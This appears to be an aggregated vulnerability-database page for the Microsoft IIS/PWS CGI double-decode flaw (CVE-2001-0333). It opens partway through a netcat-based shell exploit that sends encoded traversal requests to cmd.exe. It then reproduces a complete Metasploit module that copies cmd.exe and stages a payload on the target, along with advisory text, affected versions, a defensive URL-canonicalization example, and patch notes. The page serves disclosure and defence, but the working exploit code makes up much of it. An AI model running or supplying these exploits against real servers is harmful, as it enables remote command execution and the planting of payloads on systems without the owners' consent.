	count=$((count-1))
    done
    printf 'winnt/system32/cmd.exe?/c+'
    printf '%s' "$cmd"
    echo ' HTTP/1.0'
    echo "Host: $host"
    echo ''
    echo 'dummy'
}

testHost()
{
    host="$1"
    count=10 # you can't overdo it
    cmd='dir+c:\'
    makeRequest "$host" "$count" "$cmd" | "$NETCAT" -w 4 "$host" 80
}

testHost "$host"

- Vulnerability information (20840)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6) (EDBID:20840)
windows remote
2001-05-15 Verified
0 A.Ramos
source: http://www.securityfocus.com/bid/2708/info
     

http://www.exploit-db.com/sploits/20840.tgz

- Vulnerability information (20841)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7) (EDBID:20841)
windows remote
2001-05-15 Verified
0 Gary O'Leary-Steele
source: http://www.securityfocus.com/bid/2708/info
      

http://www.exploit-db.com/sploits/20841.zip		

- Vulnerability information (20842)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8) (EDBID:20842)
windows remote
2001-05-15 Verified
0 Roelof
source: http://www.securityfocus.com/bid/2708/info

http://www.exploit-db.com/sploits/20842.tgz		

- Vulnerability information (F89962)

Microsoft IIS/PWS CGI Filename Double Decode Command Execution (PacketStormID:F89962)
2010-05-26 00:00:00
jduck  metasploit.com
exploit,arbitrary,cgi
CVE-2001-0333

This Metasploit module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This Metasploit module will leave a metasploit payload in the IIS scripts directory.

##
# $Id: ms01_026_dbldecode.rb 9376 2010-05-26 22:46:10Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::CmdStagerTFTP

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft IIS installation
				that is vulnerable to the CGI double-decode vulnerability of 2001.

				NOTE: This module will leave a metasploit payload in the IIS scripts directory.
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9376 $',
			'References'     =>
				[
					[ 'CVE', '2001-0333' ],
					[ 'OSVDB', '556' ],
					[ 'BID', '2708' ],
					[ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ]
				],
			'DefaultTarget'  => 0
			))

		register_options(
			[
				Opt::RPORT(80),
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('EXETEMPLATE', [ false, 'Use this EXE as a template for the command stager',
					File.join(Msf::Config.install_root, "data", "templates", "template_nt4.exe") ]),
				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
			], self.class)
	end


	def dotdotslash
		possibilities = [
			"..%255c",
			"..%%35c",
			"..%%35%63",
			"..%25%35%63",
			".%252e/",
			"%252e./",
			"%%32%65./",
			".%%32%65/",
			".%25%32%65/",
			"%25%32%65./"
		]
		possibilities[rand(possibilities.length)]
	end


	def mini_http_request(opts, timeout=5)
		connect
		req = ''
		req << opts['method']
		req << ' '
		req << opts['uri']
		req << ' '
		req << "HTTP/1.0\r\n"
		req << "Host: #{datastore['RHOST']}\r\n"
		req << "\r\n"
		sock.put(req)

		# This isn't exactly awesome, but it seems to work..
		begin
			headers = sock.get_once(-1, timeout)
			body = sock.get_once(-1, timeout)
		rescue ::EOFError
			# nothing
		end

		if (datastore['DEBUG'])
			print_status("Headers:\n" + headers.inspect)
			print_status("Body:\n" + body.inspect)
		end
		disconnect
		[headers, body]
	end


	def check
		res = execute_command("dir")
		if (res.kind_of?(Array))
			body = res[1]
			if (body and body =~ /Directory of /)
				return Exploit::CheckCode::Vulnerable
			end
		end

		Exploit::CheckCode::Safe
	end


	#
	# NOTE: the command executes regardless of whether or not
	# a valid response is returned...
	#
	def execute_command(cmd, opts = {})
		uri = '/scripts/'
		exe = opts[:cgifname]
		if (not exe)
			uri << dotdotslash
			uri << dotdotslash
			uri << 'winnt/system32/cmd.exe'
		else
			uri << exe
		end
		uri << '?/x+/c+'
		uri << Rex::Text.uri_encode(cmd)

		if (datastore['VERBOSE'])
			print_status("Attempting to execute: #{uri}")
		end

		mini_http_request({
				'uri'     => uri,
				'method'  => 'GET',
			}, 20)
	end


	def exploit

		# first copy the file
		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
		# NOTE: this assumes %SystemRoot% is on the same drive as the web scripts directory
		res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")

		if (datastore['CMD'])
			res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
		else
			execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
		end

		print_status("NOTE: The copied cmd.exe and payload binaries must be deleted manually")
		# NOTE: We try to delete the copied exe here, although if the payload is running,
		# we probably can't delete it due to it being in use...
		execute_command("del #{exe_fname}")

		handler
		disconnect

	end

end
    

- Vulnerability information

556
Microsoft IIS/PWS Encoded Filename Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified, Third-party Verified, Coordinated Disclosure

- Vulnerability description

- Timeline

2001-05-15 Unknown
2001-05-15 2001-05-15

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

MS IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Design Error 2708
Yes No
2001-05-15 12:00:00 2007-01-29 08:18:00
Discovered and posted to Bugtraq by Nsfocus Security Team <security@nsfocus.com> on May 15, 2001. Posted in a Microsoft Security Bulletin MS01-026.

- Affected program versions

Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Personal Web Server 3.0
+ Microsoft NT Option Pack for NT 4.0 0
+ Microsoft Windows 95
+ Microsoft Windows 98
Microsoft Personal Web Server 1.0
- Microsoft Windows 95
Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
Microsoft IIS 4.0
+ Cisco Building Broadband Service Manager (BBSM) 5.0
+ Cisco Call Manager 3.0
+ Cisco Call Manager 2.0
+ Cisco Call Manager 1.0
+ Cisco ICS 7750
+ Cisco IP/VC 3540 Video Rate Matching Module
+ Cisco Unity Server 2.4
+ Cisco Unity Server 2.3
+ Cisco Unity Server 2.2
+ Cisco Unity Server 2.0
+ Cisco uOne 4.0
+ Cisco uOne 3.0
+ Cisco uOne 2.0
+ Cisco uOne 1.0
+ Hancom Hancom Office 2007 0
+ Microsoft BackOffice 4.5
+ Microsoft Windows NT 4.0 Option Pack
Microsoft IIS 3.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- Vulnerability discussion

Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.

When IIS receives a CGI filename request, it automatically performs two actions before completing the request:

1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.

2. When the security check is completed, IIS decodes CGI parameters.

A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.

Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.

Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.

The worm Nimda (and variants) actively exploits this vulnerability.
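The two-pass decoding described above, as an added defender-side example that is not the page's or Metasploit's code: a check modelled on the flawed order (inspect after one decode, then decode again) beside the fix of decoding to a fixpoint before looking for ".." segments. The request paths are constructed samples, and the names `decode_once`, `decode_fully`, `has_traversal` and `classify` are chosen here.

```python
import re

HEX = "0123456789abcdefABCDEF"

def decode_once(s: str) -> str:
    """One pass of %XX decoding. An invalid escape keeps its '%' literally,
    which is why '%%35c' turns into '%5c' after a single pass."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and s[i+1] in HEX and s[i+2] in HEX:
            out.append(chr(int(s[i+1:i+3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def decode_fully(s: str, max_rounds: int = 4) -> str:
    """Decode until nothing changes (bounded), so the security check sees the
    same bytes the file system will eventually see. This is the safe order."""
    for _ in range(max_rounds):
        nxt = decode_once(s)
        if nxt == s:
            return s
        s = nxt
    return s

def has_traversal(path: str) -> bool:
    """True when any path segment is '..'; both separators count on Windows."""
    return ".." in re.split(r"[\\/]", path)

def classify(uri: str) -> str:
    """Reproduce the flawed IIS order to show what a single-decode check misses."""
    path = uri.split("?", 1)[0]          # CGI parameters are not part of the filename
    once = decode_once(path)
    if has_traversal(once):
        return "traversal"               # the single-decode check does catch this
    if has_traversal(decode_fully(once)):
        return "double-encoded traversal"  # slips past the check, seen only after decoding again
    return "clean"

# Constructed sample request paths (not taken from any real log)
SAMPLES = [
    "/scripts/tools/getdrvrs.exe",
    "/scripts/my%20tool.exe",
    "/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35c..%%35%63winnt/system32/cmd.exe?/c+dir",
    "/scripts/.%252e/.%25%32%65/winnt/system32/cmd.exe?/c+dir",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{classify(s):27} {s}")
```

For a filter or IDS rule the takeaway is the order in `decode_fully`: canonicalize to a fixpoint first, then apply the path check.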

- Exploitation

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The 'execiis.c' exploit has been provided by Filip Maertens <filip@securax.be>.

Hux Flux <huxflux2001@hotmail.com> has provided the 'iisex.c' exploit.

Cyrus The Great <cyrusarmy@yahoo.com> has provided the 'IIS_CGI_decode_hole.pl' exploit.

Leif Jakob <bugtraq@jakob.weite-welt.com> has provided the 'IIS_escape_test.sh' exploit.

A.Ramos <aramos@lander.es> has provided the 'iisrules.tgz' exploit.

Gary O'leary-Steele <dilbert96@hushmail.com> has provided the 'Iisenc.zip' exploit.

Roelof <roelof@sensepost.com> has provided the following 'sensedecode.tgz' exploit.

MovAX <movax@softhome.net> has provided the following 'lala.c' exploit.

An exploit is available to members of the Immunity Partner's program. This exploit is not otherwise publicly available or known to be circulating in the wild. It may be obtained from the following URI:
https://www.immunityinc.com/downloads/immpartners/iis_doubledecode.tar

- Solution

We have conflicting reports regarding whether installing Windows 2000 SP2 after the patch (Q293826_W2K_SP3_x86_en) for this issue has been applied will re-expose this vulnerability. Although Microsoft has not confirmed the re-exposure of this issue, administrators should consider re-applying the patch.

Microsoft has released a patch that rectifies this issue.

Adriano Maia <shooter@unsekure.com.br> has provided a vulnerability check tool, which is available for download in the reference section.


Microsoft IIS 4.0

Microsoft IIS 5.0

- Related references

 

 
